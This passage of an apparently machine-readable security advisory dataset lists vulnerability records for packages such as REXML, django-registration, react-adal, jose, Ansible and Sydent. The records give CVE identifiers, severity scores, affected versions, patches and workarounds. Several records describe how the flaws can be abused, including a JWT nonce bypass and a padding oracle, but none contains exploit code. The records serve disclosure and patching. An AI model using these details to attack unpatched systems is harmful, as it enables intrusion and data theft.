'https://lists.apache.org/thread.html/ree1895a256a9db951e0d97a76222909c2e1f28c1a3d89933173deed6@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1b02dfccd27b8bbc3afd119b212452fa32e9ed7d506be9357a3a7ec@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf6de4c249bd74007f5f66f683c110535f46e719d2f83a41e8faf295f@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf99f9a25ca24fe519c9346388f61b5b3a09be31b800bf37f01473ad7@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfc9f51b4e21022b3cd6cb6f90791a6a6999560212e519b5f09db0aed@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfd3ff6e66b6bbcfb2fefa9f5a20328937c0369b2e142e3e1c6774743@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210611-0006/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4949'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/04/20/3'}]","{'cwe_ids': ['CWE-400', 'CWE-551', 'CWE-755'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T23:02:13Z', 'nvd_published_at': '2021-04-01T15:15:00Z'}"
+1.4.0,GHSA-8cr8-4vfw-mr7h,2022-08-22T19:43:17Z,2021-04-30T17:30:37Z,,['CVE-2021-28965'],REXML round-trip instability,"The REXML gem before 3.2.5 in Ruby before 2.6.7, 2.7.x before 2.7.3, and 3.x before 3.0.1 does not properly address XML round-trip issues. An incorrect document can be produced after parsing and serializing. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'rexml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28965'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/2fe62e29094d95921d7e19abbd2e26b23d78dc5b'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/3c137eb119550874b2b3e27d12b733ca67033377'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/6a250d2cd1194c2be72becbdd9c3e770aa16e752'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/9b311e59ae05749e082eb6bbefa1cb620d1a786e'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/a659c63e37414506dfb0d4655e031bb7a2e73fc8'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/f7bab8937513b1403cea5aff874cbf32fd5e8551'}, {'type': 'WEB', 'url': 'https://github.com/ruby/rexml/commit/f9d88e4948b4a43294c25dc0edb16815bd9d8618'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1104077'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/rexml'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2021-28965.yml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTVFTLFVCSUE5CXHINJEUCKSHU4SWDMT/'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/rexml'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0003/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2021/04/05/xml-round-trip-vulnerability-in-rexml-cve-2021-28965/'}]","{'cwe_ids': ['CWE-115', 'CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-22T16:31:39Z', 'nvd_published_at': '2021-04-21T07:15:00Z'}"
+1.4.0,GHSA-58c7-px5v-82hh,2023-03-30T14:48:14Z,2021-04-06T17:28:59Z,,['CVE-2021-21416'],Potential sensitive information disclosed in error reports,"django-registration is a user-registration application for Django.
+
+### Impact
+
+The django-registration package provides tools for implementing user-account registration flows in the Django web framework. In django-registration prior to 3.1.2, the base user-account registration view did not properly apply filters to sensitive data, with the result that sensitive data could be included in error reports rather than removed automatically by Django.
+
+Triggering this requires the following conditions:
+
+* A site is using django-registration < 3.1.2
+* The site has detailed error reports (such as Django's [emailed error reports to site staff/developers](https://docs.djangoproject.com/en/3.1/howto/error-reporting/#email-reports)) enabled
+* A server-side error (HTTP 5xx) occurs during an attempt by a user to register an account
+
+Under these conditions, recipients of the detailed error report will see all submitted data from the account-registration attempt, which may include the user's proposed credentials (such as a password).
+
+### Patches
+
+As of version 3.1.2, django-registration properly applies Django's `sensitive_post_parameters()` decorator to the base user-registration view, which will cause all data from the HTTP request body to be filtered from detailed error reports in the event of a server-side crash during user account registration.
+
+Note that as applied, this filters *all* HTTP request data from error reports. To selectively allow some fields but not others, see Django's own documentation (in references) and the notes below for how to apply `sensitive_post_parameters()` manually to a particular codebase's `RegistrationView` subclass(es).
+
+### Workarounds
+
+Users who cannot upgrade quickly can apply the `django.views.decorators.debug.sensitive_post_parameters()` decorator to their own registration views. The decorator should be applied on the `dispatch()` method of the appropriate `RegistrationView` class, using Django's `method_decorator()` helper. For example:
+
+```python
+from django.utils.decorators import method_decorator
+from django.views.decorators.debug import sensitive_post_parameters
+
+from django_registration.views import RegistrationView
+
+class MyRegistrationView(RegistrationView):
+ """"""
+ A RegistrationView subclass manually protected against sensitive information disclosure
+ in error reports.
+
+ """"""
+ @method_decorator(sensitive_post_parameters())
+ def dispatch(self, *args, **kwargs):
+ return super().dispatch(*args, **kwargs)
+```
+
+### References
+
+* Django's documentation on [error reporting in production](https://docs.djangoproject.com/en/3.1/howto/error-reporting/)
+* [How Django's sensitive-data filters work](https://docs.djangoproject.com/en/3.1/howto/error-reporting/#filtering-error-reports)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-registration'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ubernostrum/django-registration/security/advisories/GHSA-58c7-px5v-82hh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21416'}, {'type': 'WEB', 'url': 'https://github.com/ubernostrum/django-registration/commit/2db0bb7ec35636ea46b07b146328b87b2cb13ca5'}, {'type': 'PACKAGE', 'url': 'https://github.com/ubernostrum/django-registration'}]","{'cwe_ids': ['CWE-201', 'CWE-209'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-01T21:03:08Z', 'nvd_published_at': '2021-04-01T22:15:00Z'}"
+1.4.0,GHSA-ph32-23p8-9rw5,2021-07-28T18:30:26Z,2021-04-13T15:17:45Z,,['CVE-2019-10786'],Improper Input Validation in network-manager,"network-manager through 1.0.2 allows remote attackers to execute arbitrary commands via the ""execSync()"" argument.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'network-manager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10786'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NETWORKMANAGER-544035'}]","{'cwe_ids': ['CWE-20', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:36:25Z', 'nvd_published_at': '2020-02-04T21:15:00Z'}"
+1.4.0,GHSA-78vq-9j56-wrfr,2023-08-29T12:13:04Z,2021-04-30T17:29:15Z,,['CVE-2020-25739'],Gon gem lack of escaping certain input when outputting as JSON,"An issue was discovered in the gon gem before gon-6.4.0 for Ruby. MultiJson does not honor the escape_mode parameter to escape fields as an XSS protection mechanism. To mitigate, json_dumper.rb in gon now does escaping for XSS by default without relying on MultiJson.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'gon'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25739'}, {'type': 'WEB', 'url': 'https://github.com/gazay/gon/commit/fe3c7b2191a992386dc9edd37de5447a4e809bc7'}, {'type': 'PACKAGE', 'url': 'https://github.com/gazay/gon'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/gon/CVE-2020-25739.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00018.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4560-1/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T15:05:22Z', 'nvd_published_at': '2020-09-23T14:15:00Z'}"
+1.4.0,GHSA-r96p-v3cr-gfv8,2021-07-29T20:42:20Z,2021-04-13T15:28:01Z,,['CVE-2020-28470'],Cross-site Scripting (XSS) in @scullyio/scully,This affects the package @scullyio/scully before 1.0.9. The transfer state is serialised with the JSON.stringify() function and then written into the HTML page.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@scullyio/scully'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28470'}, {'type': 'WEB', 'url': 'https://github.com/scullyio/scully/pull/1182'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SCULLYIOSCULLY-1055829'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:40:15Z', 'nvd_published_at': '2021-01-14T10:15:00Z'}"
+1.4.0,GHSA-gqvf-892r-vjm5,2023-07-05T19:26:32Z,2021-04-13T15:42:19Z,,['CVE-2020-7942'],Improper Certificate Validation in Puppet,"Previously, Puppet operated on the model that a node with a valid certificate was entitled to all information in the system and that a compromised certificate allowed access to everything in the infrastructure. When a node's catalog falls back to the `default` node, the catalog can be retrieved for a different node by modifying facts for the Puppet run. This issue can be mitigated by setting `strict_hostname_checking = true` in `puppet.conf` on your Puppet master. Puppet 6.13.0 changes the default behavior for strict_hostname_checking from false to true. It is recommended that Puppet Open Source and Puppet Enterprise users that are not upgrading still set strict_hostname_checking to true to ensure secure behavior.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puppet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.13.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'puppet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.19'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7942'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2020-7942.yml'}, {'type': 'WEB', 'url': 'https://puppet.com/security/cve/CVE-2020-7942/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T23:15:22Z', 'nvd_published_at': '2020-02-19T21:15:00Z'}"
+1.4.0,GHSA-72rj-36qc-47g7,2023-08-25T22:09:00Z,2021-04-27T15:54:52Z,,['CVE-2021-31671'],Pgsync Contains Cleartext Transmission of Sensitive Information,"pgsync before 0.6.7 is affected by Information Disclosure of sensitive information. Syncing the schema with the `--schema-first` and `--schema-only` options is mishandled. For example, the sslmode connection parameter may be lost, which means that SSL would not be used.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'pgsync'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31671'}, {'type': 'WEB', 'url': 'https://github.com/ankane/pgsync/issues/121'}, {'type': 'WEB', 'url': 'https://github.com/ankane/pgsync/commit/05cd18f5fc09407e4b544f2c12f819cabc50c40e'}, {'type': 'WEB', 'url': 'https://github.com/ankane/pgsync/blob/master/CHANGELOG.md#067-2021-04-26'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/pgsync/CVE-2021-31671.yml'}]","{'cwe_ids': ['CWE-319'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T15:54:16Z', 'nvd_published_at': '2021-04-27T03:15:00Z'}"
+1.4.0,GHSA-333x-qr3v-g4xx,2021-04-05T19:04:46Z,2021-04-13T15:30:16Z,,['CVE-2020-7782'],Command injection in spritesheet-js,"This affects all versions of package spritesheet-js. It depends on a vulnerable package platform-command. The injection point is located in line 32 in lib/generator.js, which is triggered by main entry of the package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'spritesheet-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7782'}, {'type': 'WEB', 'url': 'https://github.com/krzysztof-o/spritesheet.js/blob/master/lib/generator.js#23L32'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SPRITESHEETJS-1048333'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/spritesheet-js'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T19:04:46Z', 'nvd_published_at': '2021-02-08T19:15:00Z'}"
+1.4.0,GHSA-9jhm-8m8c-c3f4,2021-04-15T21:00:29Z,2021-04-19T14:54:15Z,,['CVE-2021-29431'],SSRF in Sydent due to missing validation of hostnames,"### Impact
+
+Sydent can be induced to send HTTP GET requests to internal systems, due to lack of parameter validation or IP address blacklisting.
+
+It is not possible to exfiltrate data or control request headers, but it might be possible to use the attack to perform an internal port enumeration.
+
+### Patches
+
+Fixed in 9e57334, 8936925, 3d531ed, 0f00412
+
+### Workarounds
+
+A potential workaround would be to use a firewall to ensure that Sydent cannot reach internal HTTP resources.
+
+### For more information
+
+If you have any questions or comments about this advisory, email us at security@matrix.org.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-sydent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/security/advisories/GHSA-9jhm-8m8c-c3f4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29431'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/0f00412017f25619bc36c264b29ea96808bf310a'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/3d531ed50d2fd41ac387f36d44d3fb2c62dd22d3'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/8936925f561b0c352c2fa922d5097d7245aad00a'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/9e573348d81df8191bbe8c266c01999c9d57cd5f'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/releases/tag/v2.3.0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-sydent/'}]","{'cwe_ids': ['CWE-20', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-15T21:00:29Z', 'nvd_published_at': '2021-04-15T21:15:00Z'}"
+1.4.0,GHSA-7mpx-vg3c-cmr4,2021-04-09T19:38:58Z,2021-04-13T15:22:37Z,,['CVE-2020-7787'],Improper Authentication in react-adal,"This affects versions of react-adal < 0.5.1. It is possible for a specially crafted JWT token and request URL can cause the nonce, session and refresh values to be incorrectly validated, causing the application to treat an attacker-generated JWT token as authentic. The logical defect is caused by how the nonce, session and refresh values are stored in the browser local storage or session storage. Each key is automatically appended by ||. When the received nonce and session keys are generated, the list of values is stored in the browser storage, separated by ||, with || always appended to the end of the list. Since || will always be the last 2 characters of the stored values, an empty string ("""") will always be in the list of the valid values. Therefore, if an empty session parameter is provided in the callback URL, and a specially-crafted JWT token contains an nonce value of """" (empty string), then adal.js will consider the JWT token as authentic.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-adal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7787'}, {'type': 'WEB', 'url': 'https://github.com/salvoravida/react-adal/pull/115'}, {'type': 'WEB', 'url': 'https://github.com/salvoravida/react-adal/commit/74158dba1647b12fe96fa401e306a6287fe9e2a9'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-REACTADAL-1018907'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T19:38:58Z', 'nvd_published_at': '2020-12-09T17:15:00Z'}"
+1.4.0,GHSA-4v4g-726h-xvfv,2023-03-17T17:49:46Z,2021-04-19T14:59:06Z,,['CVE-2021-29445'],Padding Oracle Attack due to Observable Timing Discrepancy in jose-node-esm-runtime,"### Impact
+
+[AES_CBC_HMAC_SHA2 Algorithm](https://tools.ietf.org/html/rfc7518#section-5.2) (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDecryptionFailed` would be thrown. But a possibly observable difference in timing when padding error would occur while decrypting the ciphertext makes a padding oracle and an adversary might be able to make use of that oracle to decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block).
+
+### Patches
+
+A patch was released which ensures the HMAC tag is verified before performing CBC decryption. The fixed versions are `>=3.11.4`.
+
+Users should upgrade to `^3.11.4`.
+
+### Credits
+Thanks to Morgan Brown of Microsoft for bringing this up and Eva Sarafianou (@esarafianou) for helping to score this advisory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jose-node-esm-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/panva/jose/security/advisories/GHSA-4v4g-726h-xvfv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29445'}, {'type': 'PACKAGE', 'url': 'https://github.com/panva/jose'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/jose-node-esm-runtime'}]","{'cwe_ids': ['CWE-203', 'CWE-208', 'CWE-696'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:00:41Z', 'nvd_published_at': '2021-04-16T22:15:00Z'}"
+1.4.0,GHSA-893h-35v4-mxqx,2023-08-31T20:01:05Z,2021-04-20T16:43:33Z,,['CVE-2020-1737'],Path Traversal in Ansible,"A flaw was found in Ansible 2.7.17 and prior, 2.8.9 and prior, and 2.9.6 and prior when using the Extract-Zip function from the win_unzip module as the extracted file(s) are not checked if they belong to the destination folder. An attacker could take advantage of this flaw by crafting an archive anywhere in the file system, using a path traversal. This issue is fixed in 2.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.18'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.7.17'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.10'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.8.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.9.6'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1737'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/67795'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/67799'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1737'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FWDK3QUVBULS3Q3PQTGEKUQYPSNOU5M3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QT27K5ZRGDPCH7GT3DRI3LO4IVDVQUB7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3IMV3XEIUXL6S4KPLYYM4TVJQ2VNEP2/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T18:58:06Z', 'nvd_published_at': '2020-03-09T16:15:00Z'}"
+1.4.0,GHSA-g4mq-6fp5-qwcf,2021-08-31T21:10:23Z,2021-04-20T16:46:12Z,,['CVE-2020-1733'],Exposure of Resource to Wrong Sphere and Insecure Temporary File in Ansible,"A race condition flaw was found in Ansible Engine 2.7.17 and prior, 2.8.9 and prior, 2.9.6 and prior when running a playbook with an unprivileged become user. When Ansible needs to run a module with become user, the temporary directory is created in /var/tmp. This directory is created with ""umask 77 && mkdir -p
""; this operation does not fail if the directory already exists and is owned by another user. An attacker could take advantage to gain control of the become user as the target directory can be retrieved by iterating '/proc//cmdline'.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.7.17'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.10'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.8.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.9.6'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1733'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/67791'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1733'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-362', 'CWE-377', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T18:50:43Z', 'nvd_published_at': '2020-03-11T19:15:00Z'}"
+1.4.0,GHSA-x823-j7c4-vpc5,2023-08-30T22:10:24Z,2021-04-20T16:31:43Z,,['CVE-2021-25926'],Cross-site scripting in sickrage,"In SiCKRAGE, versions 9.3.54.dev1 to 10.0.11.dev1 are vulnerable to Reflected Cross-Site-Scripting (XSS) due to user input not being validated properly in the `quicksearch` feature. Therefore, an attacker can steal a user's sessionID to masquerade as a victim user, to carry out any actions in the context of the user.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'sickrage'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.54'}, {'fixed': '10.0.11.dev2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.11.dev1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25926'}, {'type': 'WEB', 'url': 'https://github.com/SiCKRAGE/SiCKRAGE/commit/9f42426727e16609ad3d1337f6637588b8ed28e4'}, {'type': 'PACKAGE', 'url': 'https://github.com/SiCKRAGE/SiCKRAGE'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25926,'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T20:57:46Z', 'nvd_published_at': '2021-04-12T14:15:00Z'}"
+1.4.0,GHSA-375m-5fvv-xq23,2021-04-16T23:17:39Z,2021-04-19T15:11:54Z,,[],VVE-2021-0002: Incorrect `returndatasize` when using simple forwarder proxies deployed prior to EIP-1167 adoption,"## Background
+
+@tjayrush reported a data handling issue with certain Web3 libraries using Vyper-deploy forwarder proxy contracts using our Vyper's built-in `create_forwarder_to` function prior to our change to support EIP-1167 style forwarder proxies.
+
+### Impact
+If you are an end user of a forwarder-style proxy deployed using Vyper's built-in `create_forwarder_to` function AND you have a function that returns >4096 bytes AND you do no return data sanitation on the value returned, you could potentially see a data corruption issue.
+
+Otherwise, if you are handling the result of a return call AND you expect a specific `RETURNDATASIZE` that is less than 4096 (such as `SafeERC20.safeTransfer`) then the call will fail that check.
+
+### Patches
+The issue was patched when we upgraded to EIP-1167 style forwarder proxies in #2281.
+
+### Workarounds
+If you are making a call to a contract method that is expected to return <= 4096 bytes, there is no issue as the ABI decoders in both Solidity and Vyper will truncate the data properly. Web3 libraries will also do this, unless you are doing `eth_call` or `eth_sendTransaction` directly.
+
